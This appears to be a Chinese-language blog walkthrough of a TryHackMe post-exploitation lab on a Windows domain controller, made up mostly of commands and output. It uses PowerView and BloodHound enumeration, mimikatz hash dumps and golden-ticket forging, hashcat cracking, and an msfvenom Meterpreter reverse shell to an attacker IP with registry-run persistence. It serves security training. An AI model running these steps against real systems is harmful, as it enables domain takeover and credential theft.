PowerView用法(domain中用戶、群組、共享目錄、作業系統枚舉)

在依照教學實作之前,先看看這個lab提供的工具。用linux的ssh連上windows後,用powershell -ep bypass,進入powershell。接下來移動到Downloads資料夾檢查有什麼工具,然後執行PowerView.ps1:

controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>powershell -ep bypass
PS C:\Users\Administrator> cd .\Downloads\
PS C:\Users\Administrator\Downloads> ls


    Directory: C:\Users\Administrator\Downloads


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        5/14/2020  11:39 AM        1261832 mimikatz.exe
-a----        5/14/2020  11:41 AM         374625 PowerView.ps1
-a----        5/14/2020  11:43 AM         973325 SharpHound.ps1


PS C:\Users\Administrator\Downloads> .\PowerView.ps1

 接下來用PowerView.ps1的Get-NetUser | select cn指令來枚舉域用戶:

PS C:\Users\Administrator\Downloads> Get-NetUser | select cn
Get-NetUser : The term 'Get-NetUser' is not recognized as the name of a cmdlet, function, script file, or  
operable program. Check the spelling of the name, or if a path was included, verify that the path is correct    
and try again.
At line:1 char:1
+ Get-NetUser | select cn
+ ~~~~~~~~~~~ 
    + CategoryInfo          : ObjectNotFound: (Get-NetUser:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

但是會出錯。乖乖回到根目錄,用. .\Downloads\PowerView.ps1來執行反而可以,怪事。總之要注意: 有時在檔案所在目錄內執行反而不行

PS C:\Users\Administrator\Downloads> cd ..
PS C:\Users\Administrator> . .\Downloads\PowerView.ps1
PS C:\Users\Administrator> Get-NetUser | select cn

cn                  
--
Administrator
Guest
krbtgt
Machine-1
Admin2
Machine-2
SQL Service
POST{P0W3RV13W_FTW}
sshd

PowerView.ps1也有提供域群組枚舉功能:

PS C:\Users\Administrator> Get-NetGroup -GroupName *admin*
Administrators 
Hyper-V Administrators
Storage Replica Administrators
Schema Admins
Enterprise Admins
Domain Admins 
Key Admins
Enterprise Key Admins
DnsAdmins

問題: What is the shared folder that is not set by default? PowerView.ps1有提供列出共享目錄的功能,可以看下圖,只有一個共享目錄是沒有說明的,代表不是預設。

PS C:\Users\Administrator> Invoke-ShareFinder
\\Domain-Controller.CONTROLLER.local\ADMIN$     - Remote Admin 
\\Domain-Controller.CONTROLLER.local\C$         - Default share
\\Domain-Controller.CONTROLLER.local\IPC$       - Remote IPC
\\Domain-Controller.CONTROLLER.local\NETLOGON   - Logon server share
\\Domain-Controller.CONTROLLER.local\Share      -
\\Domain-Controller.CONTROLLER.local\SYSVOL     - Logon server share

問題: What operating system is running inside of the network besides Windows Server 2019? PowerView.ps1提供列出所有domain內所使用作業系統的指令:

PS C:\Users\Administrator> Get-NetComputer -fulldata | select operatingsystem

operatingsystem                  
---------------
Windows Server 2019 Standard
Windows 10 Enterprise Evaluation
Windows 10 Enterprise Evaluation

在Get-NetUser | select cn這指令得知flag: POST{P0W3RV13W_FTW}

BloodHound安裝與基本使用

要安裝就先sudo apt install bloodhound,接下來輸入以下指令:

┌──(kali㉿kali)-[~]
└─$ sudo neo4j console
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
2023-11-25 02:46:11.290+0000 INFO  Starting...
2023-11-25 02:46:12.112+0000 INFO  This instance is ServerId{f043050c} (f043050c-22b1-4a63-a54a-4451cee05e3a)
2023-11-25 02:46:14.352+0000 INFO  ======== Neo4j 4.4.26 ========
2023-11-25 02:46:17.181+0000 INFO  Initializing system graph model for component 'security-users' with version -1 and status UNINITIALIZED
2023-11-25 02:46:17.205+0000 INFO  Setting up initial user from defaults: neo4j
2023-11-25 02:46:17.206+0000 INFO  Creating new user 'neo4j' (passwordChangeRequired=true, suspended=false)
2023-11-25 02:46:17.255+0000 INFO  Setting version for 'security-users' to 3
2023-11-25 02:46:17.259+0000 INFO  After initialization of system graph model component 'security-users' have version 3 and status CURRENT
2023-11-25 02:46:17.267+0000 INFO  Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
2023-11-25 02:46:17.654+0000 INFO  Bolt enabled on localhost:7687.
2023-11-25 02:46:19.194+0000 INFO  Remote interface available at http://localhost:7474/
2023-11-25 02:46:19.201+0000 INFO  id: 4A4D38694A2B635AED3F9E5C0CD304E1C2141CB7C04AF489709380A05A024F57
2023-11-25 02:46:19.202+0000 INFO  name: system
2023-11-25 02:46:19.202+0000 INFO  creationDate: 2023-11-25T02:46:15.293Z
2023-11-25 02:46:19.203+0000 INFO  Started.

安裝好後可以在kali的程式列去找然後執行,會出現以下畫面。下圖右下方黑框是第一次執行時會有的,要用瀏覽器連本機7474 port來更改帳密:

試試在瀏覽器打7474 port如下圖,原本想使用No authentication,但好像也不行:

只好乖乖設定username/password:

似乎不能用neo4j當密碼,如果真的用了neo4j當密碼,可能還會需要再換一次密碼。

重新啟動程式,輸入剛剛設定的帳密如上圖,可進入以下畫面。

BloodHound的內網拓樸情資蒐集,是先要把自帶的SharpHound的exe或ps1檔案上傳到靶機後執行,再把執行結束產生的zip檔,利用上圖介面載入後顯示。但要注意,剛剛安裝的2023年最新BloodHound,會無法接受TryHackMe靶機上2020年的SharpHound。所以要把剛剛安裝完的BloodHound所自帶SharpHound上傳到靶機,首先先找找在哪裡:

┌──(root㉿kali)-[~]
└─# cd /usr/lib/bloodhound/resources/app/Collectors 

┌──(root㉿kali)-[/usr/…/bloodhound/resources/app/Collectors]
└─# ls
AzureHound.md  DebugBuilds  SharpHound.exe  SharpHound.ps1

利用scp上傳,指令如下,10.10.18.32是靶機的IP。

┌──(root㉿kali)-[/usr/…/bloodhound/resources/app/Collectors]
└─# scp SharpHound.ps1 Administrator@10.10.18.32:SharpHound.ps1
Administrator@10.10.18.32's password: 
SharpHound.ps1                 :04

這時會上傳到靶機根目錄,要先把它移到Downloads再執行以下指令:

PS C:\Users\Administrator> . .\Downloads\SharpHound.ps1
PS C:\Users\Administrator> Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zi
p
2023-11-24T20:46:32.5516732-08:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of
 BloodHound
2023-11-24T20:46:32.7235490-08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Ses
sion, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-11-24T20:46:32.7391720-08:00|INFORMATION|Initializing SharpHound at 8:46 PM on 11/24/2023
2023-11-24T20:46:32.8172956-08:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for CONTROLLER
.local : Domain-Controller.CONTROLLER.local
2023-11-24T20:46:33.0672993-08:00|INFORMATION|Loaded cache with stats: 62 ID to type mappings.
 64 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2023-11-24T20:46:33.0672993-08:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts
, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-11-24T20:46:33.2235657-08:00|INFORMATION|Beginning LDAP search for CONTROLLER.local
2023-11-24T20:46:33.2547964-08:00|INFORMATION|Producer has finished, closing LDAP channel
2023-11-24T20:46:33.3016734-08:00|INFORMATION|LDAP channel closed, waiting for consumers
2023-11-24T20:47:03.4735941-08:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 88 MB RAM
2023-11-24T20:47:12.3341448-08:00|INFORMATION|Consumers finished, closing output channel
2023-11-24T20:47:12.3653931-08:00|INFORMATION|Output channel closed, waiting for output task to complete        
Closing writers
2023-11-24T20:47:12.4747656-08:00|INFORMATION|Status: 104 objects finished (+104 2.666667)/s -- Using 96 MB RAM 
2023-11-24T20:47:12.4747656-08:00|INFORMATION|Enumeration finished in 00:00:39.2602245
2023-11-24T20:47:12.5528905-08:00|INFORMATION|Saving cache with stats: 62 ID to type mappings.
 64 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2023-11-24T20:47:12.5685176-08:00|INFORMATION|SharpHound Enumeration Completed at 8:47 PM on 11/24/2023! Happy G
raphing!

把靶機生成的東西丟到攻擊機:

scp Administrator@10.10.18.32:20231124204711_loot.zip 20231124204711_loot.zip

開啟攻擊機的bloodhound,點下圖右方的Upload Data,上傳剛剛生成的zip:

這時就會顯示拓樸:

What service is also a domain admin? SQLSERVICE。點擊下圖黑色手指所指的地方即可,不過顯示出來的結果都被這塊面板遮住了,所以也不曉得答案怎麼冒出來的。

What two users are Kerberoastable? SQLSERVICE,KRBTGT。一樣點下圖黑色手指所指的地方即可,會出現答案如下圖右方:

Mimikatz簡介 (Golden Ticket生成)

PS C:\Users\Administrator> cd .\Downloads\
PS C:\Users\Administrator\Downloads> dir


    Directory: C:\Users\Administrator\Downloads


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        5/14/2020  11:39 AM        1261832 mimikatz.exe
-a----        5/14/2020  11:41 AM         374625 PowerView.ps1
-a----       11/24/2023   8:02 PM        1308348 SharpHound.ps1


PS C:\Users\Administrator\Downloads> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #18362 May  2 2020 16:23:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # privilege::debug 
Privilege '20' OK

如上面,找到mimikatz並執行,輸入privilege::debug,成功後其他的指令才可順利執行。因為這一台是domain controller,所以可以利用lsadump::lsa /patch指令把域內其他機器的hash給dump出來:

mimikatz # lsadump::lsa /patch 
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166 

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : 2777b7fec870e04dda00cd7260f7bee6

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 5508500012cc005cf7082a9a89ebdfdf

RID  : 0000044f (1103)
User : Machine1
LM   :  
NTLM : 64f12cddaa88057e06a81b54e73b949b

RID  : 00000451 (1105)
User : Admin2
LM   :
NTLM : 2b576acbe6bcfda7294d6bd18041b8fe

RID  : 00000452 (1106)
User : Machine2
LM   :
NTLM : c39f2beb3d2ec06a62cb887fb391dee0

RID  : 00000453 (1107)
User : SQLService
LM   :  
NTLM : f4ab68f27303bcb4024650d8fc5f973a

RID  : 00000454 (1108)
User : POST
LM   :
NTLM : c4b0e1b10c7ce2c4723b4e2407ef81a2

RID  : 00000457 (1111)
User : sshd
LM   :
NTLM : 2777b7fec870e04dda00cd7260f7bee6

RID  : 000003e8 (1000)
User : DOMAIN-CONTROLL$
LM   :
NTLM : 9ec2cec8b80ef3bc2f613798e502b476 

RID  : 00000455 (1109)
User : DESKTOP-2$
LM   :
NTLM : 3c2d4759eb9884d7a935fe71a8e0f54c

RID  : 00000456 (1110)
User : DESKTOP-1$
LM   :
NTLM : 7d33346eeb11a4f12a6c201faaa0d89a

What is the Machine1 password? Password1。這一題是把Machine1的NTLM(64f1xxx的)拿去用hashcat搭配rockyou字典檔破密:

┌──(root㉿kali)-[/home/kali/THM/Post-Exploitation]
└─# hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 4.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-Intel(R) Core(TM) i5-10400 CPU @ 2.90GHz, 1435/2935 MB (512 MB allocatable), 1MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

64f12cddaa88057e06a81b54e73b949b:Password1                

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1000 (NTLM)
Hash.Target......: 64f12cddaa88057e06a81b54e73b949b
Time.Started.....: Sat Nov 25 01:02:41 2023 (1 sec)
Time.Estimated...: Sat Nov 25 01:02:42 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    11116 H/s (0.04ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 3584/14344385 (0.02%)
Rejected.........: 0/3584 (0.00%)
Restore.Point....: 3328/14344385 (0.02%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: asdf1234 -> fresa
Hardware.Mon.#1..: Util:100%

Started: Sat Nov 25 00:57:26 2023
Stopped: Sat Nov 25 01:02:43 2023

What is the Machine2 Hash? c39f2beb3d2ec06a62cb887fb391dee0

接下來是dump出krbtgt的相關資訊(如sid、md5、NTLM等),以便之後創造golden ticket:

mimikatz # lsadump::lsa /inject /name:krbtgt 
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166 

RID  : 000001f6 (502)
User : krbtgt

 * Primary
    NTLM : 5508500012cc005cf7082a9a89ebdfdf
    LM   :
  Hash NTLM: 5508500012cc005cf7082a9a89ebdfdf
    ntlm- 0: 5508500012cc005cf7082a9a89ebdfdf
    lm  - 0: 372f405db05d3cafd27f8e6a4a097b2c

 * WDigest
    01  49a8de3b6c7ae1ddf36aa868e68cd9ea
    02  7902703149b131c57e5253fd9ea710d0 
    03  71288a6388fb28088a434d3705cc6f2a
    04  49a8de3b6c7ae1ddf36aa868e68cd9ea
    05  7902703149b131c57e5253fd9ea710d0
    06  df5ad3cc1ff643663d85dabc81432a81
    07  49a8de3b6c7ae1ddf36aa868e68cd9ea
    08  a489809bd0f8e525f450fac01ea2054b
    09  19e54fd00868c3b0b35b5e0926934c99
    10  4462ea84c5537142029ea1b354cd25fa
    11  6773fcbf03fd29e51720f2c5087cb81c
    12  19e54fd00868c3b0b35b5e0926934c99 
    13  52902abbeec1f1d3b46a7bd5adab3b57
    14  6773fcbf03fd29e51720f2c5087cb81c
    15  8f2593c344922717d05d537487a1336d
    16  49c009813995b032cc1f1a181eaadee4
    17  8552f561e937ad7c13a0dca4e9b0b25a
    18  cc18f1d9a1f4d28b58a063f69fa54f27
    19  12ae8a0629634a31aa63d6f422a14953
    20  b6392b0471c53dd2379dcc570816ba10
    21  7ab113cb39aa4be369710f6926b68094
    22  7ab113cb39aa4be369710f6926b68094 
    23  e38f8bc728b21b85602231dba189c5be
    24  4700657dde6382cd7b990fb042b00f9e
    25  8f46d9db219cbd64fb61ba4fdb1c9ba7
    26  36b6a21f031bf361ce38d4d8ad39ee0f
    27  e69385ee50f9d3e105f50c61c53e718e
    28  ca006400aefe845da46b137b5b50f371
    29  15a607251e3a2973a843e09c008c32e3

 * Kerberos
    Default Salt : CONTROLLER.LOCALkrbtgt
    Credentials
      des_cbc_md5       : 64ef5d43922f3b5d

 * Kerberos-Newer-Keys
    Default Salt : CONTROLLER.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 8e544cabf340db750cef9f5db7e1a2f97e465dffbd5a2dc64246bda3c75fe53d
      aes128_hmac       (4096) : 7eb35bddd529c0614e5ad9db4c798066
      des_cbc_md5       (4096) : 64ef5d43922f3b5d

 * NTLM-Strong-NTOWF
    Random Value : 666caaaaf30081f30211bd7fa445fec4

mimikatz創建golden ticket之指令(一):

mimikatz # kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-9866
96166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
User      : Administrator 
Domain    : controller.local (CONTROLLER)
SID       : S-1-5-21-849420856-2351964222-986696166
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 5508500012cc005cf7082a9a89ebdfdf - rc4_hmac_nt
Lifetime  : 11/24/2023 10:49:34 PM ; 11/21/2033 10:49:34 PM ; 11/21/2033 10:49:34 PM
-> Ticket : ticket.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

和上面是相同的指令,但是多了ticket名稱。接下來用kerberos::ptt test.kiribi指令試試ptt(pass the ticket)。

mimikatz # kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-9866
96166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500 /ticket:test.kiribi
User      : Administrator 
Domain    : controller.local (CONTROLLER)
SID       : S-1-5-21-849420856-2351964222-986696166
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 5508500012cc005cf7082a9a89ebdfdf - rc4_hmac_nt
-> Ticket : test.kiribi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

mimikatz # kerberos::ptt test.kiribi

* File: 'test.kiribi': OK

mimikatz # exit
Bye!
PS C:\Users\Administrator\Downloads> klist

Current LogonId is 0:0x24ffe0

Cached Tickets: (1)

#0>     Client: Administrator @ controller.local
        Server: krbtgt/controller.local @ controller.local
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 11/24/2023 23:06:09 (local)
        End Time:   11/21/2033 23:06:09 (local)
        Renew Time: 11/21/2033 23:06:09 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

(TODO)導入成功後可獲取域管權限?

Server Manager

What tool allows to view the event logs? Event Viewer

What is the SQL Service password? MYpassword123#

權限維持

┌──(root㉿kali)-[/home/kali/THM/Post-Exploitation]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.18.71.25 LPORT=4444 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe

┌──(root㉿kali)-[/home/kali/THM/Post-Exploitation]
└─# scp shell.exe Administrator@10.10.9.214:shell.exe
The authenticity of host '10.10.9.214 (10.10.9.214)' can't be established.
ED25519 key fingerprint is SHA256:WGyVsv2zGcSJEHIwp99EmFf5p6Q49BhKyHfmoVOGCAg.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:31: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.9.214' (ED25519) to the list of known hosts.
Administrator@10.10.9.214's password: 
shell.exe                                                                     100%   72KB  72.1KB/s   00:00

上面是生成後門的指令,並上傳至靶機(10.10.9.214),再來是進入靶機的powershell確認是否有上傳成功,的確有一個shell的執行檔:

controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Administrator> ls


    Directory: C:\Users\Administrator


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        5/13/2020   8:01 PM                3D Objects
d-r---        5/13/2020   8:01 PM                Contacts
d-r---        5/13/2020   8:01 PM                Desktop
d-r---        5/14/2020   8:27 PM                Documents
d-r---        10/3/2020   8:33 AM                Downloads
d-r---        5/13/2020   8:01 PM                Favorites
d-r---        5/13/2020   8:01 PM                Links
d-r---        5/13/2020   8:01 PM                Music
d-r---        5/13/2020   8:01 PM                Pictures
d-r---        5/13/2020   8:01 PM                Saved Games
d-r---        5/13/2020   8:01 PM                Searches
d-r---        5/13/2020   8:01 PM                Videos
-a----       11/25/2023  12:18 AM          73802 shell.exe


PS C:\Users\Administrator>

接下來啟動攻擊機的metasploit,利用exploit/multi/handler模組來聽port:

┌──(root㉿kali)-[/home/kali/THM/Post-Exploitation]
└─# msfconsole -q                                                                               
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.18.71.25
LHOST => 10.18.71.25
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

靶機要執行shell:

PS C:\Users\Administrator> ls


    Directory: C:\Users\Administrator


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        5/13/2020   8:01 PM                3D Objects
d-r---        5/13/2020   8:01 PM                Contacts
d-r---        5/13/2020   8:01 PM                Desktop
d-r---        5/14/2020   8:27 PM                Documents
d-r---        10/3/2020   8:33 AM                Downloads
d-r---        5/13/2020   8:01 PM                Favorites
d-r---        5/13/2020   8:01 PM                Links
d-r---        5/13/2020   8:01 PM                Music
d-r---        5/13/2020   8:01 PM                Pictures
d-r---        5/13/2020   8:01 PM                Saved Games
d-r---        5/13/2020   8:01 PM                Searches
d-r---        5/13/2020   8:01 PM                Videos
-a----       11/25/2023  12:18 AM          73802 shell.exe


PS C:\Users\Administrator> . .\shell.exe

這時可以發現攻擊機的shell彈回來了:

┌──(root㉿kali)-[/home/kali/THM/Post-Exploitation]
└─# msfconsole -q                                                                               
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.18.71.25
LHOST => 10.18.71.25
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.18.71.25:4444 
[*] Sending stage (175686 bytes) to 10.10.9.214
[*] Meterpreter session 1 opened (10.18.71.25:4444 -> 10.10.9.214:49826) at 2023-11-25 03:23:44 -0500

meterpreter >

用bg隱藏目前shell,可以用msf的exploit/windows/local/persistence模組來持久化,指令如下。

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/persistence
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/persistence) > set session 1
session => 1
msf6 exploit(windows/local/persistence) > run

[*] Running persistent module against DOMAIN-CONTROLL via session ID: 1
[+] Persistent VBS script written on DOMAIN-CONTROLL to C:\Users\Administrator\AppData\Local\Temp\WeIbKKpsuYFdt.vbs
[*] Installing as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\yyQdMfeoZAp
[+] Installed autorun on DOMAIN-CONTROLL as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\yyQdMfeoZAp
[*] Clean up Meterpreter RC file: /root/.msf4/logs/persistence/DOMAIN-CONTROLL_20231125.2834/DOMAIN-CONTROLL_20231125.2834.rc

持久化的好處,是如果靶機掉線,攻擊機可以很快再連回來,如下圖:


#PowerView用法(枚舉domain用戶、群組、共享目錄、作業系統) #BloodHound安裝 #BloodHound基本使用 #Mimikatz-dump domain controller hashes、Golden Ticket生成 #server manager基本使用(進入domain controller的圖形介面後枚舉) #權限維持-使用metasploit







Related Posts

Laravel x Vue Conf TW 2022

Laravel x Vue Conf TW 2022

nmapAutomator - OSCP考試好用的工具

nmapAutomator - OSCP考試好用的工具

【隨堂筆記】套件模組與環境設定

【隨堂筆記】套件模組與環境設定


Comments